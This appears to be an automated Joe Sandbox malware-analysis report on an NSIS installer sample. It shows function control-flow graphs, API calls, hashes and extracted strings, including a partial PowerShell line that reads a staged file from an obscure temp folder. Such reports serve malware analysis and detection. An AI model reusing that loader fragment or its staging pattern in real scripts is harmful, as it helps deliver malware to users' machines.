                                                                                                        control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405d7a 372 402f37-402f65 call 406284 call 405ba5 call 406284 GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 374 40310f-403113 373->374 388 403062-403065 381->388 389 4030b5-4030ba 381->389 384 402f70-402f87 382->384 386 402f89 384->386 387 402f8b-402f94 call 4032fb 384->387 386->387 394 402f9a-402fa1 387->394 395 4030bc-4030c4 call 402e79 387->395 391 403067-40307f call 403311 call 4032fb 388->391 392 403089-4030b3 GlobalAlloc call 403311 call 403116 388->392 389->374 391->389 416 403081-403087 391->416 392->389 420 4030c6-4030d7 392->420 398 402fa3-402fb7 call 405d35 394->398 399 40301d-403021 394->399 395->389 407 40302b-403031 398->407 418 402fb9-402fc0 398->418 406 403023-40302a call 402e79 399->406 399->407 406->407 409 403040-40304a 407->409 410 403033-40303d call 406751 407->410 409->384 419 403050 409->419 410->409 416->389 416->392 418->407 422 402fc2-402fc9 418->422 419->381 423 4030d9 420->423 424 4030df-4030e4 420->424 422->407 425 402fcb-402fd2 422->425 423->424 426 4030e5-4030eb 424->426 425->407 427 402fd4-402fdb 425->427 426->426 428 4030ed-403108 SetFilePointer call 405d35 426->428 427->407 429 402fdd-402ffd 427->429 431 40310d 428->431 429->389 432 403003-403007 429->432 431->374 433 403009-40300d 432->433 434 40300f-403017 432->434 433->419 433->434 434->407 435 403019-40301b 434->435 435->407
                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                          • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                          • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                        Strings
                                                                                                        • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
                                                                                                        • Error launching installer, xrefs: 00402F2D
                                                                                                        • soft, xrefs: 00402FCB
                                                                                                        • Null, xrefs: 00402FD4
                                                                                                        • "C:\Users\user\Desktop\Cpfkf79Rzk.exe", xrefs: 00402EDD
                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                        • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402EE7
                                                                                                        • Inst, xrefs: 00402FC2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                        • String ID: "C:\Users\user\Desktop\Cpfkf79Rzk.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                        • API String ID: 4283519449-2531506104
                                                                                                        • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                        • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                                                                        • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                        • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD
                                                                                                        Function 004062A6 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 209stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 436 4062a6-4062b1 437 4062b3-4062c2 436->437 438 4062c4-4062da 436->438 437->438 439 4062e0-4062ed 438->439 440 4064f2-4064f8 438->440 439->440 441 4062f3-4062fa 439->441 442 4064fe-406509 440->442 443 4062ff-40630c 440->443 441->440 445 406514-406515 442->445 446 40650b-40650f call 406284 442->446 443->442 444 406312-40631e 443->444 447 406324-406362 444->447 448 4064df 444->448 446->445 450 406482-406486 447->450 451 406368-406373 447->451 452 4064e1-4064eb 448->452 453 4064ed-4064f0 448->453 456 406488-40648e 450->456 457 4064b9-4064bd 450->457 454 406375-40637a 451->454 455 40638c 451->455 452->440 453->440 454->455 460 40637c-40637f 454->460 463 406393-40639a 455->463 461 406490-40649c call 4061cb 456->461 462 40649e-4064aa call 406284 456->462 458 4064cc-4064dd lstrlenW 457->458 459 4064bf-4064c7 call 4062a6 457->459 458->440 459->458 460->455 468 406381-406384 460->468 473 4064af-4064b5 461->473 462->473 464 40639c-40639e 463->464 465 40639f-4063a1 463->465 464->465 471 4063a3-4063c1 call 406152 465->471 472 4063dc-4063df 465->472 468->455 474 406386-40638a 468->474 479 4063c6-4063ca 471->479 477 4063e1-4063ed GetSystemDirectoryW 472->477 478 4063ef-4063f2 472->478 473->458 476 4064b7 473->476 474->463 480 40647a-406480 call 406518 476->480 481 406461-406465 477->481 482 4063f4-406402 GetWindowsDirectoryW 478->482 483 40645d-40645f 478->483 484 4063d0-4063d7 call 4062a6 479->484 485 40646a-40646d 479->485 480->458 481->480 487 406467 481->487 482->483 483->481 486 406404-40640e 483->486 484->481 485->480 490 40646f-406475 lstrcatW 485->490 492 406410-406413 486->492 493 406428-40643e SHGetSpecialFolderLocation 486->493 487->485 490->480 492->493 497 406415-40641c 492->497 494 406440-406457 SHGetPathFromIDListW CoTaskMemFree 493->494 495 406459 493->495 494->481 494->495 495->483 498 406424-406426 497->498 498->481 498->493
                                                                                                        APIs
                                                                                                        • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063E7
                                                                                                        • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,00405323,Completed,00000000), ref: 004063FA
                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Completed,?,00405323,Completed,00000000), ref: 00406436
                                                                                                        • SHGetPathFromIDListW.SHELL32(00410EA0,: Completed), ref: 00406444
                                                                                                        • CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
                                                                                                        • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                                                                                        • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405323,Completed,00000000), ref: 004064CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                        • String ID: "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylu$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                        • API String ID: 717251189-1499416109
                                                                                                        • Opcode ID: e482eba231f8f4520b3a73f5e1a7f8ad6871b3a875979b684132498817419dc4
                                                                                                        • Instruction ID: e6e4ebc4b258379f565b747a0f7be2a01952c0151b7e77293941e8e44b6b8026
                                                                                                        • Opcode Fuzzy Hash: e482eba231f8f4520b3a73f5e1a7f8ad6871b3a875979b684132498817419dc4
                                                                                                        • Instruction Fuzzy Hash: 12611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D
                                                                                                        Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 499 40176f-401794 call 402c41 call 405bd0 504 401796-40179c call 406284 499->504 505 40179e-4017b0 call 406284 call 405b59 lstrcatW 499->505 511 4017b5-4017b6 call 406518 504->511 505->511 514 4017bb-4017bf 511->514 515 4017c1-4017cb call 4065c7 514->515 516 4017f2-4017f5 514->516 524 4017dd-4017ef 515->524 525 4017cd-4017db CompareFileTime 515->525 518 4017f7-4017f8 call 405d55 516->518 519 4017fd-401819 call 405d7a 516->519 518->519 526 40181b-40181e 519->526 527 40188d-4018b6 call 4052ec call 403116 519->527 524->516 525->524 528 401820-40185e call 406284 * 2 call 4062a6 call 406284 call 4058ea 526->528 529 40186f-401879 call 4052ec 526->529 541 4018b8-4018bc 527->541 542 4018be-4018ca SetFileTime 527->542 528->514 562 401864-401865 528->562 539 401882-401888 529->539 543 402ace 539->543 541->542 545 4018d0-4018db CloseHandle 541->545 542->545 549 402ad0-402ad4 543->549 547 4018e1-4018e4 545->547 548 402ac5-402ac8 545->548 551 4018e6-4018f7 call 4062a6 lstrcatW 547->551 552 4018f9-4018fc call 4062a6 547->552 548->543 557 401901-4022fc call 4058ea 551->557 552->557 557->548 557->549 562->539 564 401867-401868 562->564 564->529
                                                                                                        APIs
                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,Polystichoid,C:\Users\user~1\AppData\Local\Temp\depersonaliseredes,?,?,00000031), ref: 004017B0
                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,Polystichoid,Polystichoid,00000000,00000000,Polystichoid,C:\Users\user~1\AppData\Local\Temp\depersonaliseredes,?,?,00000031), ref: 004017D5
                                                                                                          • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                                          • Part of subcall function 004052EC: lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                          • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                          • Part of subcall function 004052EC: lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                          • Part of subcall function 004052EC: SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                                                          • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                          • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                          • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\depersonaliseredes$C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini$Polystichoid$nerveklinikkernes
                                                                                                        • API String ID: 1941528284-2410793280
                                                                                                        • Opcode ID: f8428ececabf4161325116f3acae4040179a1912e67cedcda78f44ceba6070dd
                                                                                                        • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                                                                                        • Opcode Fuzzy Hash: f8428ececabf4161325116f3acae4040179a1912e67cedcda78f44ceba6070dd
                                                                                                        • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E
                                                                                                        Function 004052EC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 565 4052ec-405301 566 405307-405318 565->566 567 4053b8-4053bc 565->567 568 405323-40532f lstrlenW 566->568 569 40531a-40531e call 4062a6 566->569 571 405331-405341 lstrlenW 568->571 572 40534c-405350 568->572 569->568 571->567 573 405343-405347 lstrcatW 571->573 574 405352-405359 SetWindowTextW 572->574 575 40535f-405363 572->575 573->572 574->575 576 405365-4053a7 SendMessageW * 3 575->576 577 4053a9-4053ab 575->577 576->577 577->567 578 4053ad-4053b0 577->578 578->567
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                        • lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                        • lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                        • SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                        • String ID: Completed
                                                                                                        • API String ID: 2531174081-3087654605
                                                                                                        • Opcode ID: 4b00a31e1e5ea89d2dd6f616c58afdbca4195894880e32749fa2d66186394066
                                                                                                        • Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
                                                                                                        • Opcode Fuzzy Hash: 4b00a31e1e5ea89d2dd6f616c58afdbca4195894880e32749fa2d66186394066
                                                                                                        • Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8
                                                                                                        Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 579 4065ee-40660e GetSystemDirectoryW 580 406610 579->580 581 406612-406614 579->581 580->581 582 406625-406627 581->582 583 406616-40661f 581->583 585 406628-40665b wsprintfW LoadLibraryExW 582->585 583->582 584 406621-406623 583->584 584->585
                                                                                                        APIs
                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                                        • wsprintfW.USER32 ref: 00406640
                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                        • String ID: %s%S.dll$UXTHEME$\
                                                                                                        • API String ID: 2200240437-1946221925
                                                                                                        • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                        • Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
                                                                                                        • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                        • Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98
                                                                                                        Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 586 403116-40312d 587 403136-40313e 586->587 588 40312f 586->588 589 403140 587->589 590 403145-40314a 587->590 588->587 589->590 591 40315a-403167 call 4032fb 590->591 592 40314c-403155 call 403311 590->592 596 4032b2 591->596 597 40316d-403171 591->597 592->591 600 4032b4-4032b5 596->600 598 403177-403197 GetTickCount call 4067bf 597->598 599 40329b-40329d 597->599 610 4032f1 598->610 612 40319d-4031a5 598->612 601 4032e6-4032ea 599->601 602 40329f-4032a2 599->602 604 4032f4-4032f8 600->604 605 4032b7-4032bd 601->605 606 4032ec 601->606 607 4032a4 602->607 608 4032a7-4032b0 call 4032fb 602->608 613 4032c2-4032d0 call 4032fb 605->613 614 4032bf 605->614 606->610 607->608 608->596 619 4032ee 608->619 610->604 616 4031a7 612->616 617 4031aa-4031b8 call 4032fb 612->617 613->596 623 4032d2-4032de call 405e2c 613->623 614->613 616->617 617->596 624 4031be-4031c7 617->624 619->610 629 4032e0-4032e3 623->629 630 403297-403299 623->630 626 4031cd-4031ea call 4067df 624->626 632 4031f0-403207 GetTickCount 626->632 633 403293-403295 626->633 629->601 630->600 634 403252-403254 632->634 635 403209-403211 632->635 633->600 636 403256-40325a 634->636 637 403287-40328b 634->637 638 403213-403217 635->638 639 403219-40324a MulDiv wsprintfW call 4052ec 635->639 641 40325c-403261 call 405e2c 636->641 642 40326f-403275 636->642 637->612 643 403291 637->643 638->634 638->639 644 40324f 639->644 647 403266-403268 641->647 646 40327b-40327f 642->646 643->610 644->634 646->626 648 403285 646->648 647->630 649 40326a-40326d 647->649 648->610 649->646
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CountTick$wsprintf
                                                                                                        • String ID: ... %d%%
                                                                                                        • API String ID: 551687249-2449383134
                                                                                                        • Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                                                        • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                                                                                        • Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                                                        • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9
                                                                                                        Function 00405DA9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 650 405da9-405db5 651 405db6-405dea GetTickCount GetTempFileNameW 650->651 652 405df9-405dfb 651->652 653 405dec-405dee 651->653 655 405df3-405df6 652->655 653->651 654 405df0 653->654 654->655
                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00405DC7
                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00403357,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3), ref: 00405DE2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CountFileNameTempTick
                                                                                                        • String ID: "C:\Users\user\Desktop\Cpfkf79Rzk.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                                                        • API String ID: 1716503409-3194598332
                                                                                                        • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                        • Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
                                                                                                        • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                        • Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64
                                                                                                        Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
